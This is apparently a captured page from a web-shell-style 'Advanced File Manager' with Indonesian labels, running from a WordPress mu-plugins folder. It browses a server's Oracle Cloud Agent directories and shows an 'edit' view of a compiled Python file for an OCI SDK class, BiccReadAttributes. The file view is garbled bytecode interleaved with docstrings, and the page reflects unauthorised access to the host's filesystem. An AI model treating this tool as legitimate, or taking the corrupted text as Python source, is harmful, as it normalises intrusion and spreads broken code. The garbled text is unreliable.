📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
data_connectivity
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/data_connectivity/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: bicc_read_attributes.pyc
a N��f{ � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�AbstractReadAttribute� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdd� Zedd� �Zej dd� �Zed d � �Z e j dd � �Z edd � �Zej dd � �Zedd� �Zej dd� �Zedd� �Z e j dd� �Z dd� Zdd� Zdd� ZdS )�BiccReadAttributeszB Properties to configure reading from an Oracle Database. �FULL�INCREMENTALc K sV ddddddd�| _ dddd d dd�| _d| _d| _d| _d| _d| _d| _d | _dS )a7 Initializes a new BiccReadAttributes object with values from keyword arguments. The default value of the :py:attr:`~oci.data_connectivity.models.BiccReadAttributes.model_type` attribute of this class is ``BICC_READ_ATTRIBUTE`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param model_type: The value to assign to the model_type property of this BiccReadAttributes. Allowed values for this property are: "ORACLEREADATTRIBUTE", "ORACLE_READ_ATTRIBUTE", "BICC_READ_ATTRIBUTE" :type model_type: str :param fetch_size: The value to assign to the fetch_size property of this BiccReadAttributes. :type fetch_size: int :param extract_strategy: The value to assign to the extract_strategy property of this BiccReadAttributes. Allowed values for this property are: "FULL", "INCREMENTAL" :type extract_strategy: str :param external_storage: The value to assign to the external_storage property of this BiccReadAttributes. :type external_storage: oci.data_connectivity.models.ExternalStorage :param initial_extract_date: The value to assign to the initial_extract_date property of this BiccReadAttributes. :type initial_extract_date: datetime :param last_extract_date: The value to assign to the last_extract_date property of this BiccReadAttributes. :type last_extract_date: datetime �str�int�ExternalStorage�datetime)� model_type� fetch_size�extract_strategy�external_storage�initial_extract_date�last_extract_date� modelType� fetchSize�extractStrategy�externalStorage�initialExtractDate�lastExtractDateN�BICC_READ_ATTRIBUTE)� swagger_types� attribute_map�_model_type�_fetch_size�_extract_strategy�_external_storage�_initial_extract_date�_last_extract_date)�self�kwargs� r&